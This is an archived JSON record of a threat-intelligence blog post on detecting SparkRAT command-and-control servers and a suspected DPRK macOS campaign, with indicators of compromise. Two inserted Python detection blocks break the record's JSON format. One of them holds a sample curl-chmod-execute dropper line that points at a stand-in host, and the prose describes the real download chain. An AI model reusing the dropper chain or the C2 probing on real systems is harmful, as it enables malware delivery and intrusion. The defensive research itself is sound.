{
	"id": "0366bf4d-8b1f-40ed-8b79-ee19e0cb9457",
	"created_at": "2026-04-06T00:22:29.156322Z",
	"updated_at": "2026-04-10T13:12:26.8355Z",
	"deleted_at": null,
	"sha1_hash": "c8ae673b2a254bc3f0a8ac04c7ef91bd87888c89",
	"title": "Unmasking SparkRAT: Detection \u0026 macOS Campaign Insights",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4100205,
	"plain_text": "Unmasking SparkRAT: Detection \u0026 macOS Campaign Insights\r\nPublished: 2025-01-28 · Archived: 2026-04-05 19:05:35 UTC\r\nSparkRAT, first released on GitHub in 2022 by user XZB-1248, remains a favored tool because of its modular design, web-based user interface, and cross-platform support for Windows, macOS, and Linux. The malware has been deployed as a post-exploitation tool in campaigns associated with CVE-2024-27198 and has been observed in cyber espionage operations targeting government organizations. In our previous post from April last year, \"Spotting SparkRAT: Detection Tactics \u0026 Sandbox Findings\", we gave a high-level overview of the RAT and analyzed an implant and its C2 server.\r\nIn this post, we will:\r\nShare techniques for detecting SparkRAT servers in the wild.\r\nExamine a recent sighting: an extension of a suspected DPRK campaign targeting macOS users.\r\nUnderstanding SparkRAT Communications and Detection\r\nSparkRAT is written in Go and uses the WebSocket protocol to communicate with its command-and-control server. Following the WebSocket handshake, the client also issues a plain HTTP POST request to check whether a newer build of the RAT is available. By default, the server listens for clients on port 8000, although operators can easily change this. As we demonstrate below, these default settings provide a valuable fingerprint for identifying SparkRAT deployments in the wild.\r\nFigure 1: PCAP screenshot showing SparkRAT initial communications.\r\nFor those interested in real-time tracking, our Active C2s page offers scan results for more than 100 tools, both legitimate and malicious, including SparkRAT. 
This feature, which we are constantly improving, provides detailed visibility into active command-and-control infrastructure.\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 1 of 10\r\nFigure 2: Snippet of the SparkRAT servers we track in Hunt.\r\nDetection Opportunities\r\nSparkRAT uses HTTP Basic Authentication to restrict access to its C2 server panel; the username and password must be set in the server configuration file before the panel accepts a login. Visitors to one of these pages are met with a login prompt, which may deter further exploration by casual observers.\r\nWhen a suspected web panel on the default port 8000 is requested, the HTTP response headers look like this:\r\nHTTP/1.1 401 Unauthorized\r\nWww-Authenticate: Basic realm=Authorization Required\r\nDate: (value omitted)\r\nContent-Length: 0\r\nNotably, standard header fields such as Server, Content-Type, and Connection are absent, which serves as an additional filter for potential SparkRAT deployments. As discussed above, the client's upgrade check is a POST request, shown in the example below.\r\nFigure 3: Example request for an upgrade in SparkRAT.\r\nThe server expects the path /api/client/update?arch=* along with a few specific headers: a User-Agent of the form SPARK COMMIT: '' (the commit value is empty in this example) and a similar Secret header. 
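As an added example (not code from the Hunt.io post or from the SparkRAT project), the following Python reproduces the two-step check described in this section as offline functions: it builds the POST probe to /api/client/update with the SPARK COMMIT User-Agent and Secret headers, and it classifies raw responses first by the bare 401 Basic-auth challenge (Authorization Required realm, no Server, Content-Type or Connection headers, empty body) and second by the 400 JSON body that carries the ${i18n|COMMON.INVALID_PARAMETER} placeholder. The sample responses are constructed from the two responses this section shows; the Date values, the Secret value and the arch parameter are placeholders, and nothing is sent over the network.

```python
import json

CRLF = chr(13) + chr(10)   # HTTP line terminator, built without escape sequences

# Markers taken from the two responses shown in this section.
EXPECTED_REALM = 'Authorization Required'
EXPECTED_I18N_KEY = 'COMMON.INVALID_PARAMETER'
ABSENT_HEADERS = ('server', 'content-type', 'connection')   # SparkRAT omits these


def build_update_probe(host, port=8000, arch='amd64'):
    '''Raw POST shaped like the client update check; Secret and arch are placeholders.'''
    lines = [
        'POST /api/client/update?arch=' + arch + ' HTTP/1.1',
        'Host: ' + host + ':' + str(port),
        'User-Agent: SPARK COMMIT: ',   # empty commit value, as in the post
        'Secret: ' + '0' * 32,          # placeholder value (assumption)
        'Content-Length: 0',
        'Connection: close',
        '', '',
    ]
    return CRLF.join(lines).encode()


def parse_http_response(raw):
    '''Split a raw HTTP/1.x response string into (status_code, headers, body).'''
    head, _, body = raw.partition(CRLF + CRLF)
    status_line, *header_lines = head.split(CRLF)
    status_code = int(status_line.split()[1])   # tolerates a missing reason phrase
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return status_code, headers, body


def looks_like_sparkrat_panel(raw):
    '''Step 1: the panel on port 8000 answers with a bare 401 Basic challenge.'''
    code, headers, _ = parse_http_response(raw)
    challenge = headers.get('www-authenticate', '')
    if code != 401 or not challenge.lower().startswith('basic'):
        return False
    if EXPECTED_REALM not in challenge:      # substring, so a quoted realm also matches
        return False
    if any(name in headers for name in ABSENT_HEADERS):
        return False
    return headers.get('content-length') == '0'


def looks_like_sparkrat_update_api(raw):
    '''Step 2: an unparameterised POST to /api/client/update returns 400 and a JSON
    body that still carries the untranslated i18n placeholder.'''
    code, headers, body = parse_http_response(raw)
    if code != 400 or not headers.get('content-type', '').startswith('application/json'):
        return False
    try:
        payload = json.loads(body)
    except ValueError:
        return False
    return payload.get('code') == -1 and EXPECTED_I18N_KEY in str(payload.get('msg', ''))


def classify(panel_response, update_response):
    '''Combine both checks into a verdict for a scanning pipeline.'''
    panel = looks_like_sparkrat_panel(panel_response)
    api = looks_like_sparkrat_update_api(update_response)
    if panel and api:
        return 'likely SparkRAT C2'
    if panel or api:
        return 'partial match, verify manually'
    return 'no match'


# Constructed sample responses modelled on the two shown in this section
# (the Date values are made up).
SAMPLE_PANEL_401 = CRLF.join([
    'HTTP/1.1 401 Unauthorized', 'Www-Authenticate: Basic realm=' + EXPECTED_REALM,
    'Date: Tue, 28 Jan 2025 00:00:00 GMT', 'Content-Length: 0', '', ''])
ERROR_BODY = json.dumps({'code': -1, 'msg': '${i18n|' + EXPECTED_I18N_KEY + '}'},
                        separators=(',', ':'))   # 52 bytes, matching Content-Length above
SAMPLE_UPDATE_400 = CRLF.join([
    'HTTP/1.1 400', 'Content-Type: application/json; charset=utf-8',
    'Date: Tue, 28 Jan 2025 00:00:00 GMT', 'Content-Length: ' + str(len(ERROR_BODY)),
    '', ERROR_BODY])
# A generic Basic-auth 401 from an ordinary web server, for contrast.
SAMPLE_OTHER_401 = CRLF.join([
    'HTTP/1.1 401 Unauthorized', 'Server: nginx', 'Www-Authenticate: Basic realm=Restricted',
    'Content-Type: text/html', 'Content-Length: 0', '', ''])

if __name__ == '__main__':
    print(classify(SAMPLE_PANEL_401, SAMPLE_UPDATE_400))   # likely SparkRAT C2
    print(classify(SAMPLE_OTHER_401, SAMPLE_UPDATE_400))   # partial match, verify manually
```

Two caveats when wiring this into a scanner: the realm check is a substring match, so it also matches a server that quotes the realm value, and the Content-Length comparison on the 400 response is deliberately not hard-coded to 52, because a different build could render a different message. Treat a hit as a lead to verify, not as proof, and probe a single host rather than sweeping ranges.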
What if we pick a single server to investigate (being a good internet neighbor and probing only one) and send a POST request to the /api/client/update endpoint?\r\nA suspected SparkRAT server responds with the following headers:\r\nHTTP/1.1 400\r\nContent-Type: application/json; charset=utf-8\r\nDate: (value omitted)\r\nContent-Length: 52\r\nMore interestingly, the response also carries a body worth noting:\r\n{\"code\":-1,\"msg\":\"${i18n|COMMON.INVALID_PARAMETER}\"}\r\nThe msg value is an i18n placeholder that SparkRAT's web front end is expected to translate rather than a rendered message, and the body is exactly 52 bytes, matching the Content-Length above.\r\nWe use some additional tricks to validate SparkRAT servers. However, combining the 401 response headers on port 8000 with the JSON response above is a good starting point for anyone looking for C2s to investigate or research.\r\nSuspected DPRK Campaign Persists with SparkRAT Activity\r\nIn late November 2024, researcher Germán Fernández (@1ZRR4H) highlighted a possible campaign delivering SparkRAT via fake meeting pages and domains, initially identified by @malwareHunterTeam. Around the same time, Chris Duggan (@TLP_R3D) shared additional insights, including a search query and a list of IP addresses likely associated with the activity.\r\nUsing Hunt to actively scan for RAT servers, we investigated further to identify any infrastructure that had not yet been publicly reported. 
Somewhat unexpectedly, our scans revealed three additional servers, each hosting an open directory containing SparkRAT implants and exhibiting tactics consistent with those previously described.\r\nThe identified IPs, along with their ASNs, locations, and associated domains, are as follows:\r\nIP Address        | ASN                                        | Location | Domain(s)\r\n152.32.138[.]108  | UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED | KR       | gsoonmann[.]site, gmnormails[.]site, gmoonsom[.]site, nasanecesoi[.]site, gmoocsoom[.]site, gmcomamz[.]site, namerowem[.]site, gmoosomnoem[.]site, mncomgom[.]site, ggnmcomas[.]site\r\n15.235.130[.]160  | OVH SAS                                    | SG       | remote.henh247[.]net, updatetiker[.]net\r\n118.194.249[.]38  | UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED | KR       | gomncomow[.]site, gooczmmnc[.]site, gnmoommle[.]space\r\nThese findings indicate that the campaign is still going strong, albeit with some differences in delivery tactics. Unlike the previously reported activity, we observed no meeting-related domains or web pages, and at least one of the open directories delivered SparkRAT from a different path than previously documented. We examine the files and open directories uncovered in this activity in the sections below.\r\n152.32.138[.]108\r\nHosted in Seoul, South Korea, this server exhibits several characteristics frequently associated with DPRK-linked infrastructure: the UCLOUD ASN, an Apache HTTPD server stack, top-level domains (TLDs) such as .site and .space registered through Namecheap, and Let's Encrypt TLS certificates.\r\nAn exposed directory at /dev on port 443 contains three files and two empty subfolders. Two of the files are bash scripts (dev.sh and test.sh) that perform identical actions. Of note, the directory path matches the download URL mentioned in the X/Twitter post, which used /dev/ticker. 
The third file is client.bin, a SparkRAT client.\r\nFigure 4: Screenshot of the open directory at https://gmcomamz[.]site:443.\r\nBoth scripts use curl to download client.bin from http://updatetiker[.]site/dev/client.bin, hosted on the second IP discussed below, 15.235.130[.]160. The -o flag saves the file as /Users/shared/pull.bin and the -L flag makes curl follow redirects. Once downloaded, chmod 777 grants read, write, and execute permission on pull.bin to all users. Finally, the renamed file is executed as a background process.\r\nFigure 5: Commands in the dev.sh file.\r\nFile Analysis: client.bin\r\nThe file client.bin (SHA-256: cd313c9b706c2ba9f50d338305c456ad3392572efe387a83093b09d2cb6f1b56) is a 64-bit Mach-O binary containing numerous strings from the SparkRAT repository; it was detected as malicious by 16 of 63 vendors. Upon execution, the malware drops the file com.second.startup.plist in /Users/run and configures it to execute every 10 minutes as its persistence mechanism.\r\nThe malware attempts multiple TCP connections to 51.79.218[.]159:8000, an OVH SAS server located in Singapore. Although that port was unresponsive during our research, port 80 hosts a webpage claiming to be an online gaming platform, One68, aimed at Vietnamese speakers. 
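Before turning to the One68 page, here is an added example (not code from the Hunt.io post or from the malware) that turns the host-side behaviour described above into two checks a responder can run over collected artifacts: a script that curls a payload into /Users/Shared, marks it 777 and starts it in the background, and a launchd job named com.second.startup that fires every 10 minutes. The sample script and plists are constructed for the example; the download host example.invalid, the StartInterval of 600 seconds as the encoding of the 10 minute cadence, and the plist keys are assumptions, since the post does not show the plist contents. The post prints the path as /Users/shared; macOS filesystems are case-insensitive by default, so the checks compare lower-cased paths.

```python
import plistlib
import textwrap

# Staging paths named in the post (compared case-insensitively).
STAGING_DIRS = ('/users/shared/', '/users/run/')
SHORT_INTERVAL = 600   # seconds; assumed encoding of the 10 minute cadence


def scan_shell_script(text):
    '''Flag the curl -> chmod 777 -> background-exec chain of dev.sh/test.sh.
    Returns a list of findings, empty when the script does not match.'''
    findings, downloaded = [], set()
    for ln in (ln.strip() for ln in text.splitlines()):
        if not ln or ln.startswith('#'):
            continue
        toks = ln.split()
        if toks[0] == 'curl' and '-o' in toks and toks.index('-o') + 1 < len(toks):
            target = toks[toks.index('-o') + 1]
            if target.lower().startswith(STAGING_DIRS):
                downloaded.add(target)
                findings.append('curl writes payload to ' + target)
        elif toks[0] == 'chmod' and len(toks) >= 3 and toks[1] == '777' and toks[2] in downloaded:
            findings.append('chmod 777 on downloaded payload ' + toks[2])
        elif toks[0] in downloaded and toks[-1] == '&':
            findings.append('downloaded payload started in background: ' + toks[0])
    return findings


def scan_launch_plist(data):
    '''Flag a launchd job that runs a binary from a staging dir on a short timer.'''
    try:
        plist = plistlib.loads(data)
    except Exception:            # not a plist, or malformed XML
        return []
    findings = []
    program = plist.get('Program') or (plist.get('ProgramArguments') or [''])[0]
    if str(program).lower().startswith(STAGING_DIRS):
        findings.append('job runs binary from staging dir: ' + str(program))
    interval = plist.get('StartInterval')
    if isinstance(interval, int) and interval <= SHORT_INTERVAL:
        findings.append('short StartInterval: ' + str(interval) + 's')
    if findings:
        findings.insert(0, 'label ' + str(plist.get('Label', '?')))
    return findings


# Constructed samples. The script mirrors the three actions the post describes
# for dev.sh, with a placeholder download host; the plist layout is assumed.
SAMPLE_SCRIPT = textwrap.dedent('''
    #!/bin/bash
    curl -L -o /Users/Shared/pull.bin http://example.invalid/dev/client.bin
    chmod 777 /Users/Shared/pull.bin
    /Users/Shared/pull.bin &
''')
SAMPLE_PLIST = textwrap.dedent('''
    <?xml version='1.0' encoding='UTF-8'?>
    <plist version='1.0'>
    <dict>
      <key>Label</key><string>com.second.startup</string>
      <key>ProgramArguments</key>
      <array><string>/Users/Shared/pull.bin</string></array>
      <key>StartInterval</key><integer>600</integer>
      <key>RunAtLoad</key><true/>
    </dict>
    </plist>
''').strip().encode()
BENIGN_PLIST = textwrap.dedent('''
    <?xml version='1.0' encoding='UTF-8'?>
    <plist version='1.0'>
    <dict>
      <key>Label</key><string>com.example.nightly</string>
      <key>ProgramArguments</key><array><string>/usr/bin/true</string></array>
      <key>StartInterval</key><integer>86400</integer>
    </dict>
    </plist>
''').strip().encode()

if __name__ == '__main__':
    for finding in scan_shell_script(SAMPLE_SCRIPT) + scan_launch_plist(SAMPLE_PLIST):
        print(finding)
```

In practice, feed scan_shell_script the scripts pulled from the open directories and scan_launch_plist every plist under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons as well as any plist found in /Users/run. A plist sitting outside the standard launchd directories is not loaded automatically, so also compare against the output of launchctl list to see whether the job is actually registered.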
The page's title, \"one68.top - Game Bai Dinh Cao,\" translates to \"High-Class Card Game.\" As shown in the figure below, the site offers a download button for an Android APK (one68_1_1.0.apk, SHA-256: ffe4cfde23a1ef557f7dc56f53b3713d8faa9e47ae6562b61ffa1887e5d2d56e).\r\nFigure 6: Online gaming webpage hosted on port 80 of 51.79.218[.]159.\r\nWhile our initial analysis confirms specific capabilities of the malware, such as its networking behavior, we were unable to extract a broader range of its functionality. Further investigation into the binary is ongoing.\r\nThe APK makes a GET request to http://one68[.]top/client, and the server responds with HTTP 101 Switching Protocols, indicating an upgrade to a WebSocket connection. Notably, the response includes Cloudflare-specific headers, indicating the service is used to hinder analysis and hide the IP address above.\r\nFigure 7: Screenshot of the APK GET request to the /client endpoint (Triage).\r\n15.235.130[.]160\r\nOur scans identified 15.235.130[.]160 as an active SparkRAT C2 server operating on the default port 8000 approximately two weeks before publication. Alongside the download domain updatetiker[.]site, the server also hosts additional domains, including henho247[.]net and remote.henho247[.]net.\r\nFigure 8: Screenshot of the IP overview and the detected SparkRAT C2 on port 8000 (Hunt).\r\nAn open directory on this server contains files with names consistent with those observed on the previous server, such as client.bin and dev.sh, but its empty subfolders are labeled /tradem/ and /tradew/. 
The client.bin file on this system was last modified on January 10, four days later than the version hosted on the earlier server.\r\nThe binary (SHA-256: 52277d43d2f5e8fa8c856e1c098a1ff260a956f0598e16c8fb1b38e3a9374d15) executes similarly to the earlier sample and communicates with the same C2 on port 8000.\r\nFigure 9: Open directory for 15.235.130[.]160.\r\n118.194.249[.]38\r\nOperational security appears to have been considered more carefully on this server, as no open directories were identified. Nevertheless, the final IP in our analysis resolves to three domains that align with the previously observed patterns:\r\ngomncomow[.]site\r\ngooczmmnc[.]site\r\ngnmoommle[.]space\r\nWe will continue to monitor this IP, as activity has been observed on multiple ports over the past two days. Although the absence of an open directory limits immediate analysis, its domain patterns and recent behavior suggest it remains part of the threat actors' infrastructure.\r\nConclusion\r\nSparkRAT remains a persistent threat because of its adaptability and consistent use by adversaries across platforms. The findings in this blog highlight how detailed analysis of its infrastructure and associated artifacts can uncover additional activity, offering defenders valuable opportunities to monitor and disrupt these operations proactively.\r\nThe suspicious APK and its connection to a webpage mimicking a Vietnamese online gaming platform underscore the evolving tactics threat actors employ to target unsuspecting users. 
These techniques, coupled with SparkRAT's modular design and cross-platform capabilities, make it a versatile tool for adversaries seeking persistence, exfiltration, and other malicious objectives.\r\nOur research team will continue to refine our detection methods and expand our scanning beyond the default port, which will allow us to uncover additional SparkRAT infrastructure and ensure the security community is equipped with actionable intelligence to combat this threat.\r\nNetwork Observables and Indicators of Compromise (IOCs)\r\nIP Address        | Hosting Provider                           | Location\r\n152.32.138[.]108  | UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED | KR\r\n15.235.130[.]160  | OVH SAS                                    | SG\r\n118.194.249[.]38  | UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED | KR\r\n51.79.218[.]159   | OVH SAS                                    | SG\r\nHost Observables and Indicators of Compromise\r\nFilename         | SHA-256 Hash                                                     | Notes\r\nclient.bin       | cd313c9b706c2ba9f50d338305c456ad3392572efe387a83093b09d2cb6f1b56 | Hosted on an open directory at 152.32.138[.]108\r\nclient.bin       | 52277d43d2f5e8fa8c856e1c098a1ff260a956f0598e16c8fb1b38e3a9374d15 | Found on an exposed directory at 15.235.130[.]160\r\none68_1_1.0.apk  | ffe4cfde23a1ef557f7dc56f53b3713d8faa9e47ae6562b61ffa1887e5d2d56e | Downloadable file on one68[.]top\r\nSource: https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections"
	],
	"report_names": [
		"sparkrat-server-detection-macos-activity-and-malicious-connections"
	],
	"threat_actors": [],
	"ts_created_at": 1775434949,
	"ts_updated_at": 1775826746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c8ae673b2a254bc3f0a8ac04c7ef91bd87888c89.pdf",
		"text": "https://archive.orkl.eu/c8ae673b2a254bc3f0a8ac04c7ef91bd87888c89.txt",
		"img": "https://archive.orkl.eu/c8ae673b2a254bc3f0a8ac04c7ef91bd87888c89.jpg"
	}
}